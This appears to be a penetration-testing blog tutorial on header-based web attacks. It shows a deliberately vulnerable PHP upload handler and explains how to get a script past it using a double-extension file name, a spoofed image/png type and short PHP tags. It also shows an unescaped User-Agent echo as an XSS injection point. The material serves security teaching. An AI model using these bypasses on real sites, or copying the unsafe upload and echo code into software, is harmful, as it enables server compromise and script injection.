After some changes on domain and transfer to PentesterLab Blog ;
Edition and manipulation of HTTP headers values in a penetration test help us for get access quickly and implemented in a different platform, so in this article we talking about some scenarios that formed in header based attacks.
– Uploader Limitation Evasion
We know that uploaders are milestone of attackers for test malicious contents and get access with current tricks. in this section we’re gonna review some codes and introduce bypassing techniques.
the first at all is an uploader that accepts only PNG files and it has a protection for php files.
<?php
//PentesterLab.ir
if (isset($_FILES["file"]))
if ($_FILES["file"]["error"] <= 0)
if ($_FILES["file"]["type"] == "image/png")
if (strpos($_FILES["file"]["name"], ".png") > 0)
if (strpos(fgets(fopen($_FILES["file"]["tmp_name"], "r"), 4096), "php") <= 0) {
move_uploaded_file($_FILES["file"]["tmp_name"], "./" . $_FILES["file"]["name"]);
echo "<img src=\"./". $_FILES["file"]["name"] . "\" />";
}
else
echo "Hacking Attemp!";
else
echo "Only files with PNG Type";
else
echo "Only files with PNG Type";
else
echo "Error!";
?>
Apparently, all things are truly worked and uploaded files/contents limited to PNG that should be “image/png” media type. So we want be able to upload our script to get access and bypass it via edit some parameters of http headers.
first, try to change the name of the file that we can upload as “pwn.php.png or .php”
the name is : “pwn.php.png or “
and the type of it : “.php”
On this payload we had define it in php as “.png” but webserver known it as “.php”, But the second step is our file media type that must be change as “image/png” .
Image may be NSFW.
Clik here to view.
step 1
Image may be NSFW.
Clik here to view.
step 2
we can bypass the codes for limitation of file type and the file name, but it detectable as “php” and returns “Hacking Attemp!” why ?!
because of the tag and the signature of php files which known as “<?php”. So we try to change the tag to “<? ?><? … ” and using the simple tag of it.
Image may be NSFW.
Clik here to view.
step 3
our malicious script successfully uploaded.
– UserAgent Return Values Manipulation
Have you ever seen that a website shows you your operation system , browser name and etc ?
Do you know that those information returns from user-agent value, and it has changeable like smoking a “Bahman” cigar ?! :)
Some programmers use this technique for return user information without any filtering or incomplete protection, like ThisSite that only filtered “<script>” on referrer value submitted (may be some blacklist for protect XSS has been embedded) . some people use eval() on their return values for some features that based on attackers situation for implement their payload.
very simple example :
<?php $agent = $_SERVER['HTTP_USER_AGENT']; echo $agent; ?>
Image may be NSFW.
Clik here to view.
Malicious value injection